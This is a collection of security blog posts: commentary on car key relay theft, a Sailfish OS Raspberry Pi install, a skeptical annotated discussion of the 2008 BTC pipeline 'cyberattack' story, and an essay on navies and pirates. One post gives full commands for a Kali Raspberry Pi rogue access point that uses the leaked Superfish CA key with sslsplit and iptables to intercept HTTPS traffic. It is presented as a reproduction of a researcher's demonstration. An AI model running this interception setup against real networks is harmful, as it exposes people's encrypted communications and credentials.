That is the real question that a reporter in the NYT should have been asking people. Instead he found someone who suggested putting his key into a Faraday cage (blocking signals).

So now he has the bright idea to put his key in the freezer at home with the ice cream.

That shows a fundamentally flawed understanding and defeatist security. Who wants to keep their car at home to be safe because they can’t carry a freezer around everywhere. A metal box or even mylar bag would have been at least a nod in the right direction, to safely parking your car somewhere besides home.

Basically the NYT reporter over-reacts and then pats himself on the back with a silly and ineffective band-aid story. He misses entirely the opportunity to take a serious inquiry into why car manufacturers have been quiet about a long-time key management problem. Perhaps my Tweets were able to sway him towards realizing this is not as novel as he first thought.

Even better would have been if the reporter had been swayed to research why manufacturers use obfuscation instead of opening key management to a standard and free platform for innovation, supporting the safety advances from lock pick competitions. This issue is not about a Prius, a Toyota or even scary electronics entering our world. It is really about risk economics, policy and consumer rights.

Posted in Security.


SailPi: Install Sailfish OS on Raspberry Pi 2

It is surprisingly easy to install the Sailfish OS on a Raspberry Pi 2. There’s an official blog for all this and I just thought I’d share a few notes here for convenience. This took me about 5 minutes.


A: Preparation of SailPi

  1. Download sailfish image (511.5MB) provided by sailpi
  2. MD5: 29edd5770fba01af5c547a90a589a22a 
    SHA-1: 156ea9d01b862420db0b32de313e6602865cb8f9
    
  3. Extract sfos-rpi2-glacier-03272015.img.xz – I used 7-zip
  4. Write sfos-rpi2-glacier-03272015.img to SD – I used Win32DiskImager
  5. Insert the SD to rPi2, connect network and power-up
  6. SSH to sailpi using default user:password (root:root)

B: Configuration of SailPi. I simply verify I am running Sailfish (Jolla), change the root password, and change the desktop orientation to horizontal.

  1. [root@Jolla ~]# uname -a

    Linux Jolla 3.18.8-v7+ #2 SMP PREEMPT Mon Mar 9 14:11:05 UTC 2015 armv7l armv7l armv7l GNU/Linux

  2. [root@Jolla ~]# passwd
  3. [root@Jolla ~]# vi /usr/share/lipstick-glacier-home-qt5/nemovars.conf
  4. GLACIER_NATIVEORIENTATION=2


It almost was too easy.

In theory this could be the start of a home-made smartphone. The official SailPi blog talks about steps to enable bluetooth as well as adding a PiScreen and GSM board.

Posted in Security.


Antenna: Computer Viruses and Hacking (BBC 1989)

Interesting BBC program warning about a “new generation of hackers” in 1989. It’s full of soundbites about computer risk:

  • I thought it would never happen to me…
  • It’s a shock when it happens to you…
  • Everywhere I’ve worked so far it’s been there…
  • I felt as if I’d been burgled…
  • I’ve become far more cautious…
  • I think everyone needs to be careful…

Posted in History, Security.


SuperFish Exploit: Kali on Raspberry Pi 2

Robert Graham wrote a handy guide for a Superfish Exploit using Raspbian on a Raspberry Pi 2 (RP2). He mentioned wanting to run it on Kali instead so I decided to take that for a spin. Here are the steps. It took me about 20 minutes to get everything running.


A: Preparation of kali

  1. Download kali image (462.5MB) provided by @essobi
  2. Extract kali-0.1-rpi.img.xz – I used 7-zip
  3. MD5: 277ac5f1cc2321728b2e5dcbf51ac7ef 
    SHA-1: d45ddaf2b367ff5b153368df14b6a781cded09f6
    
  4. Write kali-0.1-rpi.img to SD – I used Win32DiskImager
  5. Insert the SD to RP2, connect network and power-up
  6. SSH to kali using default user:password (root:toor)

B: Configuration of kali. In brief, I changed the default password and added a user account. I gave the new account sudo rights, then I logged out and back in as the new user. After that I updated kali for pi (rpi-update).

  1. root@kali:~$ passwd
  2. root@kali:~$ adduser davi
  3. root@kali:~$ visudo
  4. davi@kali:~$ sudo apt-get install curl
  5. davi@kali:~$ sudo apt-get update && sudo apt-get upgrade
  6. davi@kali:~$ sudo wget https://raw.githubusercontent.com/Hexxeh/rpi-update/master/rpi-update -O /usr/bin/rpi-update
  7. davi@kali:~$ sudo chmod 755 /usr/bin/rpi-update
  8. davi@kali:~$ sudo rpi-update
  9. davi@kali:~$ sudo reboot

C: Configuration of network as Robert did – follow the elinux guide for details on how to edit the files.

  1. davi@kali:~$ sudo apt-get install hostapd udhcpd
  2. davi@kali:~$ sudo vi /etc/default/udhcpd
  3. davi@kali:~$ sudo ifconfig wlan0 192.168.42.1
  4. davi@kali:~$ sudo vi /etc/network/interfaces
  5. davi@kali:~$ sudo vi /etc/hostapd/hostapd.conf
  6. davi@kali:~$ sudo sh -c “echo 1 > /proc/sys/net/ipv4/ip_forward”
  7. davi@kali:~$ sudo vi /etc/sysctl.conf
  8. davi@kali:~$ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
  9. davi@kali:~$ sudo iptables -A FORWARD -i eth0 -o wlan0 -m state –state RELATED,ESTABLISHED -j ACCEPT
  10. davi@kali:~$ sudo iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
  11. davi@kali:~$ sudo sh -c “iptables-save > /etc/iptables.ipv4.nat”
  12. davi@kali:~$ sudo vi /etc/network/interfaces
  13. davi@kali:~$ sudo service hostapd start
  14. davi@kali:~$ sudo service udhcpd start
  15. davi@kali:~$ sudo update-rc.d hostapd enable
  16. davi@kali:~$ sudo update-rc.d udhcpd enable

D: Configuration for Superfish Exploit. These commands follow Robert’s. I downloaded his test.pem file, duplicated it into a certificate file and then used vi to remove the redundant bits.

  1. davi@kali:~$ wget https://github.com/robertdavidgraham/pemcrack/blob/master/test.pem
  2. davi@kali:~$ cp test.pem ca.crt
  3. davi@kali:~$ vi test.pem
  4. davi@kali:~$ vi ca.crt
  5. davi@kali:~$ openssl rsa -in test.pem -out ca.key
  6. davi@kali:~$ sudo apt-get install sslsplit
  7. davi@kali:~$ mkdir /var/log/sslsplit
  8. davi@kali:~$ sslsplit -D -l connections.log -S /var/log/sslsplit -k ca.key -c ca.crt ssl 0.0.0.0 8443 &
  9. davi@kali:~$ sudo iptables -t nat -A PREROUTING -p tcp –dport 443 -j REDIRECT –to-ports 8443

Obviously Robert did all the hard work figuring this out. I’ve just tested the basics to see what it would take to setup a Kali instance. If I test further or script it I’ll update this page. Also perhaps I should mention I have a couple hardware differences from Robert’s guide:

  • RP2. Cost: $35
  • 32GB SanDisk micro SD (which is FAR larger than necessary). Cost: $18
  • Rosewill RNX-N180UBE wireless USB with external antenna, able to do “infrastructure mode”. Cost $21

Total cost: (re-purposed from other projects) $35 + $18 + 21 = $74
Total time: 20 minutes


Because I used such a large SD card, and the Kali image was so small, I also resized the partitions to make use of all that extra space.

Check starting use percentages:

  • davi@kali:~$ df -k
  • Filesystem     1K-blocks    Used Available Use% Mounted on
    rootfs           2896624 1664684   1065084  61% /
    /dev/root        2896624 1664684   1065084  61% /
    devtmpfs          470368       0    470368   0% /dev
    tmpfs              94936     460     94476   1% /run
    tmpfs               5120       0      5120   0% /run/lock
    tmpfs             189860       0    189860   0% /run/shm
    

Resize the partition

  1. davi@kali:~$ sudo fdisk /dev/mmcblk0
  2. type “p” (print partition table and NOTE START NUMBER FOR PARTITION 2)
  3. type “d” (delete partition)
  4. type “2” (second partition)
  5. type “n” (new partition)
  6. type “p” (primary partition)
  7. type “2” (second partition)
  8. hit “enter” to select default start number (SHOULD MATCH START NUMBER NOTED)
  9. hit “enter” to select default end number
  10. type “w” (write partition table)
  11. davi@kali:~$ sudo reboot
  12. davi@kali:~$ sudo resize2fs /dev/mmcblk0p2

Check finished use percentages:

  • davi@kali:~$ df -k
  • Filesystem     1K-blocks    Used Available Use% Mounted on
    rootfs          30549476 1668420  27590636   6% /
    /dev/root       30549476 1668420  27590636   6% /
    devtmpfs          470368       0    470368   0% /dev
    tmpfs              94936     464     94472   1% /run
    tmpfs               5120       0      5120   0% /run/lock
    tmpfs             189860       0    189860   0% /run/shm
    

Posted in Security.


Cyberwar revisionism: 2008 BTC pipeline explosion

Over on a site called “Genius” I’ve made a few replies to some other peoples’ comments on an old story: “Mysterious ’08 Turkey Pipeline Blast Opened New Cyberwar”

Genius offers the sort of experience where you have to believe a ton of pop-up scripts is a real improvement over plain text threads. Perhaps I don’t understand properly the value of markups and votes. So I’m re-posting my comments here in a more traditional text thread format, rather than using sticky-notes hovering over a story, not least of all because it’s easier for me to read and reference later.

Thinking about the intent of Genius, if there were an interactive interface I would rather see, the power of link-analysis and social data should be put into a 3D rotating text broken into paragraphs connected by lines from sources that you can spin through in 32-bit greyscale…just kidding.

But seriously if I have to click on every paragraph of text just to read it…something more innovative might be in order, more than highlights and replies. Let me know using the “non-genius boxes” (comment section) below if you have any thoughts on a platform you prefer.

Also I suppose I should introduce my bias before I begin this out-take of Genius (my text-based interpretation of their notation system masquerading as a panel discussion):

During the 2008 pipeline explosion I was developing critical infrastructure protection (CIP) tools to help organizations achieve reliability standards of the North American Electric Reliability Council (NERC). I think that makes me someone “familiar with events” although I’m never sure what journalists mean by that phrase. I studied the events extensively and even debriefed high-level people who spoke with media at the time. And I’ve been hands-on in pen-tests and security architecture reviews for energy companies.


Bloomberg: Countries have been laying the groundwork for cyberwar operations for years, and companies have been hit recently with digital broadsides bearing hallmarks of government sponsorship.

Thomas Rid: Let’s try to be precise here — and not lump together espionage (exfiltrating data); wiping attacks (damaging data); and physical attacks (damaging hardware, mostly ICS-run). There are very different dynamics at play.

Me: Agree. Would prefer not to treat every disaster as an act of war. In the world of IT the boundary between operational issues and security events (especially because software bugs are so frequent) tends to be very fuzzy. When security want to investigate and treat every event as a possible attack it tends to have the effect of 1) shutting down/slowing commerce instead of helping protect it 2) reducing popularity and trust in security teams. Imagine a city full of roadblocks and checkpoints for traffic instead of streetlights and a police force that responds to accidents. Putting in place the former will have disastrous effects on commerce.
People use terms like sophisticated and advanced to spin up worry about great unknowns in security and a looming cyberwar. Those terms should be justified and defined carefully; otherwise basic operational oversights and lack of quality in engineering will turn into roadblock city.

Bloomberg: Sony Corp.’s network was raided by hackers believed to be aligned with North Korea, and sources have said JPMorgan Chase & Co. blamed an August assault on Russian cyberspies.

Thomas Rid: In mid-February the NYT (Sanger) reported that the JPMorgan investigation has not yielded conclusive evidence.

Mat Brown: Not sure if this is the one but here’s a recent Bits Blog post on the breach http://mobile.nytimes.com/blogs/bits/2014/12/23/daily-report-simple-flaw-allowed-jp-morgan-computer-breach/

Me: “FBI officially ruled out the Russian government as a culprit” and “The Russian government has been ruled out as sponsor” http://www.reuters.com/article/2014/10/21/us-cybersecurity-jpmorgan-idUSKCN0IA01L20141021

Bloomberg: The Refahiye explosion occurred two years before Stuxnet, the computer worm that in 2010 crippled Iran’s nuclear-enrichment program, widely believed to have been deployed by Israel and the U.S.

Robert Lee: Sort of. The explosion of 2008 occurred two years before the world learned about Stuxnet. However, Stuxnet was known to have been in place years before 2010 and likely in development since around 2003-2005. Best estimates/public knowledge place Stuxnet at Natanz in 2006 or 2007.

Me: Robert is exactly right. Idaho National Labs held tests called “Aurora” (over-accelerating destroying a generator) on the morning of March 4, 2007. (https://muckrock.s3.amazonaws.com/foia_files/aurora.wmv)
By 2008 it became clear in congressional hearings that NERC had provided false information to a subcommittee in Congress on Aurora mitigation efforts by the electric sector. Tennessee Valley Authority (TVA) in particular was called vulnerable to exploit. Some called for a replacement of NERC. All before Stuxnet was “known”.

Bloomberg: National Security Agency experts had been warning the lines could be blown up from a distance, without the bother of conventional weapons. The attack was evidence other nations had the technology to wage a new kind of war, three current and former U.S. officials said.

Robert Lee: Again, three anonymous officials. Were these senior level officials that would have likely heard this kind of information in the form of PowerPoint briefings? Or were these analysts working this specific area? This report relies entirely on the evidence of “anonymous” officials and personnel. It does not seem like serious journalism.

Me: Agree. Would like to know who the experts were, given we also saw Russia dropping bombs five days later. The bombs after the fire kind of undermines the “without the bother” analysis.

Bloomberg: Stuxnet was discovered in 2010 and this was obviously deployed before that.

Robert Lee: I know and greatly like Chris Blask. But Jordan’s inclusion of his quote here in the story is odd. The timing aspect was brought up earlier and Chris did not have anything to do with this event. It appears to be an attempt to use Chris’ place in the community to add value to the anonymous sources. But Chris is just making an observation here about timing. And again, this was not deployed before Stuxnet — but Chris is right that it was done prior to the discovery of Stuxnet.

Me: Yes although I’ll disagree slightly. As Aurora tests by 2008 were in general news stories, and congress was debating TVA insecurity and NERC ability to honestly report risk, Stuxnet was framed to be more unique and notable that it should have been.

Bloomberg: U.S. intelligence agencies believe the Russian government was behind the Refahiye explosion, according to two of the people briefed on the investigation.

Robert Lee: It’s not accurate to say that “U.S. intelligence agencies” believe something and then source two anonymous individuals. Again, as someone that was in the U.S. Intelligence Community it consistently frustrates me to see people claiming that U.S. intelligence agencies believe things as if they were all tightly interwoven, sharing all intelligence, and believing the same things.

Additionally, these two individuals were “briefed on the investigation” meaning they had no first hand knowledge of it. Making them non-credible sources even if they weren’t anonymous.

Me: Also interesting to note the August 28, 2008 Corner House analysis of the explosion attributed it to Kurdish Rebels (PKK). Yet not even a mention here? http://www.eca-watch.org/problems/oil_gas_mining/btc/CornerHouse_re_ECGD_and%20BTC_26aug08.pdf

[NOTE: I’m definitely going to leverage Robert’s excellent nuance statements when talking about China. Too often the press will try to paint a unified political picture, despite social scientists working to parse and explain the many different perspectives inside an agency, let alone a government or a whole nation. Understanding facets means creating better controls and more rational policy.]

Bloomberg: Although as many as 60 hours of surveillance video were erased by the hackers

Robert Lee: This is likely the most interesting piece. It is entirely plausible that the cameras were connected to the Internet. This would have been a viable way for the ‘hackers’ to enter the network. Segmentation in industrial control systems (especially older pipelines) is not common — so Internet accessible cameras could have given the intruders all the access they needed.

Me: I’m highly suspect of this fact from experience in the field. Video often is accidentally erased or disabled. Unless there is a verified chain of malicious destruction steps, it almost always is more likely to find surveillance video systems fragile, designed wrong or poorly run.

Bloomberg: …a single infrared camera not connected to the same network captured images of two men with laptop computers walking near the pipeline days before the explosion, according to one of the people, who has reviewed the video. The men wore black military-style uniforms without insignias, similar to the garb worn by special forces troops.

Robert Lee: This is where the story really seems to fall apart. If the hackers had full access to the network and were able to connect up to the alarms, erase the videos, etc. then what was the purpose of the two individuals? For what appears to be a highly covert operation the two individuals add an unnecessary amount of potential error. To be able to disable alerting and manipulate the process in an industrial control system you have to first understand it. This is what makes attacks so hard — you need engineering expertise AND you must understand that specific facility as they are all largely unique. If you already had all the information to do what this story is claiming — you wouldn’t have needed the two individuals to do anything. What’s worse, is that two men walking up in black jumpsuits or related type outfits in the middle of the night sounds more like engineers checking the pipeline than it does special forces. This happened “days before the explosion” which may be interesting but is hardly evidence of anything.

Me: TOTALLY AGREE. I will just add that earlier we were being told “blown up from a distance, without the bother of conventional weapons” and now we’re being told two people on the ground walking next to the pipeline. Not much distance there.

Bloomberg: “Given Russia’s strategic interest, there will always be the question of whether the country had a hand in it,” said Emily Stromquist, an energy analyst for Eurasia Group, a political risk firm based in Washington.

Robert Lee: Absolutely true. “Cyber” events do not happen in a vacuum. There is almost always geopolitical or economical interests at play.

Me: I’m holding off from any conclusion it’s a cyber event. And strategic interest to just Russia? That pipeline ran across how many conflict/war zones? There was much controversy during planning. In 2003 analysts warned that the PKK were highly likely to attack it. http://www.baku.org.uk/publications/concerns.pdf

Bloomberg: Eleven companies — including majority-owner BP, a subsidiary of the State Oil Company of Azerbaijan, Chevron Corp. and Norway’s Statoil ASA — built the line, which has carried more than two billion barrels of crude since opening in 2006.

Robert Lee: I have no idea how this is related to the infrared cameras. There is a lot of fluff entered into this article.

Me: This actually supports the argument that the pipeline was complicated both in politics and infrastructure, increasing risks. A better report would run through why BP planning would be less likely to result in disaster in this pipeline compared to their other disasters, especially given the complicated geopolitical risks.

Bloomberg: According to investigators, every mile was monitored by sensors. Pressure, oil flow and other critical indicators were fed to a central control room via a wireless monitoring system. In an extra measure, they were also sent by satellite.

Robert Lee: This would be correct. There is a massive amount of sensor and alert data that goes to any control center — pipelines especially — as safety is of chief importance and interruptions of even a few seconds in data can have horrible consequences.

Me: I believe it is more accurate to say every mile was designed to be monitored by sensors. We see quite clearly from investigations of the San Bruno, California disaster (killing at least 8 people) that documentation and monitoring of lines are imperfect even in the middle of an expensive American suburban neighborhood. http://articles.latimes.com/2011/aug/30/local/la-me-0831-san-bruno-20110831

Bloomberg: The Turkish government’s claim of mechanical failure, on the other hand, was widely disputed in media reports.

Thomas Rid: A Wikileaks State Department cable refers to this event — by 20 August 2009, BP CEO Inglis was “absolutely confident” this was a terrorist attack caused by external physical force. I haven’t had the time to dig into this, but here’s the screenshot from the cable:
Thanks to @4Dgifts

Me: It may help to put it into context of regional conflict at that time. Turkey started Operation Sun (Güneş Harekatı) attacking the PKK, lasting into March or April. By May the PKK had claimed retaliation by blowing up a pipeline between Turkey and Iran, which shutdown gas exports for 5 days (http://www.dailystar.com.lb/News/Middle-East/2008/May-27/75106-explosion-cuts-iran-turkey-gas-pipeline.ashx). We should at least answer why BTC would not be a follow-up event.
And there have been several explosions since then as well, although I have not seen anyone map all the disasters over time. Figure an energy market analyst must have done one already somewhere.
And then there’s the Turkish news version of events: “Turkish official confirms BTC pipeline blast is a terrorist act” http://www.hurriyet.com.tr/english/finance/9660409.asp

Thomas Rid: Thanks — Very useful!

Bloomberg: “We have never experienced any kind of signal jamming attack or tampering on the communication lines, or computer systems,” Sagir said in an e-mail.

Robert Lee: This whole section seems to heavily dispute the assumption of this article. There isn’t really anything in the article presented to dispute this statement.

Me: Agree. The entire article goes to lengths to make a case using anonymous sources. Mr. Sagir is the best source so far and says there was no tampering detected. Going back to the surveillance cameras, perhaps they were accidentally erased or non-functioning due to error.

Bloomberg: The investigators — from Turkey, the U.K., Azerbaijan and other countries — went quietly about their business.

Robert Lee: This is extremely odd. There are not many companies who have serious experience with incident response in industrial control system scenarios. Largely because industrial control system digital forensics and incident response is so difficult. Traditional information technology networks have lots of sources of forensic data — operations technology (industrial control systems) generally do not.

The investigators coming from one team that works and has experience together adds value. The investigators coming from multiple countries sounds impressive but on the ground level actually introduces a lot of confusion and conflict as the teams have to learn to work together before they can even really get to work.

Me: Agree. The pipeline would see not only confusion in the aftermath, it also would find confusion in the setup and operation, increasing chance of error or disaster.

Bloomberg: As investigators followed the trail of the failed alarm system, they found the hackers’ point of entry was an unexpected one: the surveillance cameras themselves.

Robert Lee: How? This is a critical detail. As mentioned before, incident response in industrial control systems is extremely difficult. The Industrial Control System — Computer Emergency Response Team (ICS-CERT) has published documents in the past few years talking about the difficulty and basically asking the industry to help out. One chief problem is that control systems usually do not have any ability to perform logging. Even in the rare cases that they do — it is turned off because it uses too much storage. This is extremely common in pipelines. So “investigators” seem to have found something but it is nearly outside the realm of possible that it was out in the field. If they had any chance of finding anything it would have been on the Windows or Linux systems inside the control center itself. The problem here is that wouldn’t have been the data needed to prove a failed alarm system.

It is very likely the investigators found malware. That happens a lot. They likely figured the malware had to be linked to blast. This is a natural assumption but extremely flawed based on the nature of these systems and the likelihood of random malware to be inside of a network.

Me: Agree. Malware noticed after disaster becomes very suspicious. I’m most curious why anyone would setup surveillance cameras for “deep into the internal network” access. Typically cameras are a completely isolated/dedicated stack of equipment with just a browser interface or even dedicated monitors/screens. Strange architecture.

Bloomberg: The presence of the attackers at the site could mean the sabotage was a blended attack, using a combination of physical and digital techniques.

Robert Lee: A blended cyber-physical attack is something that scares a lot of people in the ICS community for good reason. It combines the best of two attack vectors. The problem in this story though is that apparently it was entirely unneeded. When a nation-state wants to spend resources and talents to do an operation — especially when they don’t want to get caught — they don’t say “let’s be fancy.” Operations are run in the “path of least resistance” kind of fashion. It keeps resource expenditures down and keeps the chance of being caught low. With everything discussed as the “central element of the attack” it was entirely unneeded to do a blended attack.

Me: What really chafes my analysis is that the story is trying to build a scary “entirely remote attack” scenario while simultaneously trying to explain why two people are walking around next to the pipeline.
Also agree attackers are like water looking for cracks. Path of least resistance.

Bloomberg: The super-high pressure may have been enough on its own to create the explosion, according to two of the people familiar with the incident.

Robert Lee: Another two anonymous sources.

Me: And “familiar with the incident” is a rather low bar.

Bloomberg: Having performed extensive reconnaissance on the computer network, the infiltrators tampered with the units used to send alerts about malfunctions and leaks back to the control room. The back-up satellite signals failed, which suggested to the investigators that the attackers used sophisticated jamming equipment, according to the people familiar with the probe.

Robert Lee: If the back-up satellite signal failed in addition to alerts not coming from the field (these units are polled every few seconds or minutes depending on the system) there would have been an immediate response from the personnel unless they were entirely incompetent or not present (in that case this story would be even less likely). But jamming satellite links is an even extra level of effort beyond hacking a network and understanding the process. If this was truly the work of Russian hackers they are not impressive for all the things they accomplished — they were embarrassingly bad at how many resources and methods they needed to accomplish this attack when they had multiple ways of accomplishing it with any one of the 3-4 attack vectors.

Me: Agree. The story reads to me like conventional attack, known to be used by PKK, causes fire. Then a series of problems in operations are blamed on super-sophisticated Russians. “All these systems not working are the fault of elite hackers”

Bloomberg: Investigators compared the time-stamp on the infrared image of the two people with laptops to data logs that showed the computer system had been probed by an outsider.

Robert Lee: “Probed by an outsider” reveals the system to be an Internet connected system. “Probes” is a common way to describe scans. Network scans against publicly accessible devices occur every second. There is a vast amount of research and public information on how often Internet scans take place (usually a system begins to be scanned within 3-4 seconds of being placed online). It would have been more difficult to find time-stamps in any image that did not correlate to probing.

Me: Also is there high trust in time-stamps? Accurate time is hard. Looking at the various scenarios (attackers had ability to tamper, operations did a poor job with systems) we should treat a time-stamp-based correlation as how reliable?

Bloomberg: Years later, BP claimed in documents filed in a legal dispute that it wasn’t able to meet shipping contracts after the blast due to “an act of terrorism.”

Robert Lee: Which makes sense due to the attribution the extremists claimed.

Me: I find this sentence mostly meaningless. My guess is BP was using legal or financial language because of the constraints in court. Would have to say terrorism, vandalism, etc. to speak appropriately given precedent. No lawyer wants to use a new term and establish new norms/harm when they can leverage existing work.

Bloomberg: A pipeline bombing may fit the profile of the PKK, which specializes in extortion, drug smuggling and assaults on foreign companies, said Didem Akyel Collinsworth, an Istanbul-based analyst for the International Crisis Group. But she said the PKK doesn’t have advanced hacking capabilities.

Robert Lee: This actually further disproves the article’s theory. If the PKK took credit, the company believed it to be them, the group does not possess hacking skills, and specialists believe this attack was entirely their style — then it was very likely not hacking related.

Me: Agree. Wish this pipeline explosion would be put in context of other similar regional explosions, threats from the PKK that they would attack pipelines and regional analyst warnings of PKK attacks.

Bloomberg: U.S. spy agencies probed the BTC blast independently, gathering information from foreign communications intercepts and other sources, according to one of the people familiar with the inquiry.

Robert Lee: I would hope so. There was a major explosion in a piece of critical infrastructure right before Russia invaded Georgia. If the intelligence agencies didn’t look into it they would be incompetent.

Me: Agree. Not only for defense, also for offense knowledge, right? Would be interesting if someone said they probed it differently than the other blasts, such as the one three months earlier between Turkey and Iran.

Bloomberg: American intelligence officials believe the PKK — which according to leaked State Department cables has received arms and intelligence from Russia — may have arranged in advance with the attackers to take credit, the person said.

Robert Lee: This is all according to one, yet again, anonymous source. It is extremely far fetched. If Russia was going to go through the trouble of doing a very advanced and covert cyber operation (back in 2008 when these types of operations were even less publicly known) it would be very out of character to inform an extremist group ahead of time.

Me: Agree, although also plausible to tell a group a pipeline would be blown up without divulging method. Then the group claims credit without knowing method. The disconnect I see is Russia trying to bomb the same pipeline five days later. Why go all conventional if you’ve owned the systems and can remotely do what you like?

Bloomberg: The U.S. was interested in more than just motive. The Pentagon at the time was assessing the cyber capabilities of potential rivals, as well as weaknesses in its own defenses. Since that attack, both Iran and China have hacked into U.S. pipeline companies and gas utilities, apparently to identify vulnerabilities that could be exploited later.

Robert Lee: The Pentagon is always worried about these types of things. President Clinton published PDD-63 in 1998 talking about these types of vulnerabilities and they have been assessing and researching at least since then. There is also no evidence provided about the Iranian and Chinese hacks claimed here. It’s not that these types of things don’t happen — they most certainly do — it’s that it’s not responsible or good practice to cite events because “we all know it’s happening” instead of actual evidence.

Me: Yes, explaining major disasters already happening and focus of congressional work (2008 TVA) would be a better perspective on this section. August 2003 was a sea change in bulk power risk assessment. Talking about Iran and China seems empty/idle speculation in comparison: http://www.nerc.com/pa/rrm/ea/Pages/Blackout-August-2003.aspx

Bloomberg: As tensions over the Ukraine crisis have mounted, Russian cyberspies have been detected planting malware in U.S. systems that deliver critical services like electricity and water, according to John Hultquist, senior manager for cyber espionage threat intelligence at Dallas-based iSight Partners, which first revealed the activity in October.

Robert Lee: It’s not that I doubt this statement, or John, but this is another bad trend in journalism. Using people that have a vested interest in these kind of stories for financial gain is a bad practice in the larger journalism community. iSight Partners offer cybersecurity services and specialize in threat intelligence. So to talk about ‘cyberspies’, ‘cyber espionage’, etc. is something they are financially motivated to hype up. I don’t doubt the credibility or validity of John’s statements but there’s a clear conflict of interest that shouldn’t be used in journalism especially when there are no named sources with first-hand knowledge on the event.

Me: Right! Great point Robert. Reads like free advertising for threat intelligence company X rather than trusted analysis. Would mind a lot less if a non-sales voice was presented with a dissenting view, or the journalist added in caution about the source being of a particular bias.
Also what’s the real value of this statement? As a crisis with Russia unfolds, we see Russia being more active/targeted. Ok, but what does this tell us about August 2008? No connection is made. Reader is left guessing.

Bloomberg: The keyboard was the better weapon.

Robert Lee: The entire article is focused on anonymous sources. In addition, the ‘central element of the attack’ was the computer intrusion which was analyzed by incident responders. Unfortunately, incident response in industrial control systems is at such a juvenile state that even if there were a lot of data, which there never is, it is hard to determine what it means. Attribution is difficult (look at the North Korea and Sony case where much more data was available including government level resources). This story just doesn’t line up.

When journalism reports on something it acknowledges would be history changing better information is needed. When those reports stand to increase hype and tension between nation-states in already politically tense times (Ukraine, Russia, Turkey, and the U.S.). Not including actual evidence is just irresponsible.

Me: Agree. It reads like a revision of history, so perhaps that’s why we’re meant to believe it’s “history changing.” I’m ready to see evidence of a hack yet after six years we have almost nothing to back up these claims. There is better detail about what happened from journalists writing at the time.
Also if we are to believe the conclusion that keyboards are the better weapon, why have two people walking along the pipeline and why bomb infrastructure afterwards? Would Russia send a letter after making a phone call? I mean if you look carefully at what Georgia DID NOT accuse Russia of it was hacking critical infrastructure.
Lack of detailed evidence, anonymous attribution, generic/theoretical vulnerability of infrastructure statements, no contextual explanations…there is little here to believe the risk was more than operational errors coupled with PKK targeted campaign against pipelines.

Posted in Energy, History, Security.


Eventually Navies Take Over

I attended a “keynote” talk at a security conference a few years ago with this title as a key premise. You know how I love history, so I was excited. The speaker, a well-regarded mathematician, told us “eventually, navies take over” because they will “perform tight surveillance of sea lanes and ensure safety for commerce”.

That sounded counter-factual to me, given what history tells us about rigid empires trying to oppress and control markets. So while I enjoyed the topic I noted some curious issues with this presentation perspective.

Common sense tells me authorities have historically struggled to stem a shift to nimbler, lighter and more open commerce lanes. Authoritarian models struggle for good reasons. Shipping routes protected by a Navy basically are a high tax that does not scale well, requiring controversial forms of “investment”.

This comes up all the time in security history circles. A “security tax” becomes an increasing liability because scaling perimeters is hard (the same way castles could not scale to protect trade on land); an expensive perimeter-based model as it grows actually helps accelerate demise of the empire that wants to stay in power. Perhaps we even could say navies trying to take over is the last straw for an enterprise gasping to survive as cloud services roll-in…

Consider that the infamous Spanish navy “flota” model — a highly guarded and very large shipment — seems an expensive disaster waiting to happen. It’s failure is not in an inability to deliver stuff from point A to B. The failure is in sustainability; an inability to stop competitive markets from forming with superior solutions (like the British version that came later trying to prevent American encroachment). The flota was an increased cost to maintain a route, which obsoleted itself.

Back to the keynote presentation it pointed out an attacker (e.g. the British) could make a large haul. This seems an odd point to make. Such a large haul was the effect of the flota, the perimeter model. There was a giant load of assets to be attacked, because it was an annual batch job. The British could take a large haul if they won, by design.

In defense of the flota model, the frequency of failure was low over many years. If we measured success simply on whether some shipments were profitable then it looks a lot better. This seems to me like saying Blockbuster was a success so eventually video rental stores (brick-and-mortar) take over. It sounds like going backwards in time not forward. The Spanish had a couple hundred years of shipments that kept the monarchy running, which may impress us just like the height of Blockbuster sales. To put it in infosec terms, should we say a perimeter model eventually will take over because it was used by company X to protect its commerce?

On the other hand the 80-years and the 30-years wars that Spain lost puts the flota timeline in different perspective. Oppressive extraction and taxes to maintain a navy that was increasingly overstretched and vulnerable, a period of expensive wars and leaks…in relative terms, this was not exactly a long stretch of smooth sailing.

More to the point, in peacetime the navy simply could not build a large enough presence to police all the leaks to pervasive draconian top-down trading rules. People naturally smuggled and expanded around navies or when they were not watching. We saw British and Dutch trade routes emerge out of these failures. And in wartime a growth in privateers increased difficulty for navies to manage routes against competition because the navy itself was targeted. Thus in a long continuum it seems we move towards openness until closed works out a competitive advantage. Then openness cracks the model and out-competes until…and so on. If we look at this keynote’s lesson from a Spanish threat to “take over” what comes to mind is failure; otherwise wouldn’t you be reading this in Spanish?

Hopefully this also puts into context why by 1856 America refused to ban “letters of marque” (despite European nations doing so in the Paris Declaration). US leadership expressly stated it would never want or need a permanent/standing navy (it believed privateers would be its approach to any dispute with a European military). The young American country did not envision having its own standing navy perhaps because it saw no need for the relic of unsustainable and undesirable closed markets. The political winds changed quite a bit for the US in 1899 after dramatic defeats of Spain but that’s another topic.

The conference presentation also unfortunately used some patently misleading statements like “pirates that refused to align with a government…[were] eventually executed”. I took that to mean the presenter was saying a failure to choose to serve a nation, a single one at that, would be a terminal risk for any mercenary or pirate. And I don’t believe that to be true at all.

We know some pirates, perhaps many, avoided being forced into alignment through their career and then simply retired on terms they decided. Peter Easton, a famous example, bought himself land with a Duke’s title in France. Duke Easton’s story has no signs of coercion or being forced to align. It sounds far more like a retirement agreement of his choosing. The story of “Wife of Cheng” is another example. Would you call her story the alignment of a pirate with a government, or a government aligning with the pirate? She clearly refused to align and was not executed.

Cheng I Sao repelled attack after attack by both the Chinese navy and the many Portuguese and British bounty hunters brought in to help capture her. Then, in 1810, the Chinese government tried a different tactic — they offered her universal pirate amnesty in exchange for peace.

Cheng I Sao jumped at the opportunity and headed for the negotiating table. There, the pirate queen arranged what was, all told, a killer deal. Fewer than 400 of her men received any punishment, and a mere 126 were executed. The remaining pirates got to keep their booty and were offered military jobs.

